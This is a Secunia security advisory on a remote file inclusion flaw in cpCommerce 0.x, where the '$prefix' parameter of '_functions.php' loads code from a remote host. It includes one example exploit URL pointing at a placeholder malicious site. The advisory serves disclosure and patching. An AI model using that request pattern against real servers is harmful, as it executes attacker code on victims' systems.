cpCommerce v0.5f and below contains an input validation error in _functions.php which allows remote arbitrary code execution. Fix available here.
38a5f115f7ff25fa54a8cbaece68467108a84c1f858b98478337d930a03652d9
TITLE:
cpCommerce Arbitrary File Inclusion Vulnerability
SECUNIA ADVISORY ID:
SA10034
VERIFY ADVISORY:
http://www.secunia.com/advisories/10034/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
cpCommerce 0.x
DESCRIPTION:
A vulnerability has been reported in cpCommerce, which can be
exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an input validation error in
"_functions.php". This can be exploited to execute arbitrary code on
a vulnerable system by supplying a path to a malicious file on a
remote system in the "$prefix" variable.
Example, which includes "http://[malicious_site]/index_config.php"
and "http://[malicious_site]/index_gateways.php":
http://[victim]/[path_of_cpcommerce]/_functions.php?prefix=http://[malicious_site]/index
The vulnerability has been reported in version 0.05f. Prior versions
may also be affected.
SOLUTION:
The vendor has posted some solutions at:
http://cpcommerce.org/#fixes
REPORTED BY / CREDITS:
Astharot, Zone-H.
ORIGINAL ADVISORY:
ZH2003-31SA:
http://www.zone-h.org/en/advisories/read/id=3284/
----------------------------------------------------------------------
Secunia recommends that you verify all advisories you receive, by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Contact details:
Web : http://www.secunia.com/
E-mail : support@secunia.com
Tel : +45 7020 5144
Fax : +45 7020 5145
----------------------------------------------------------------------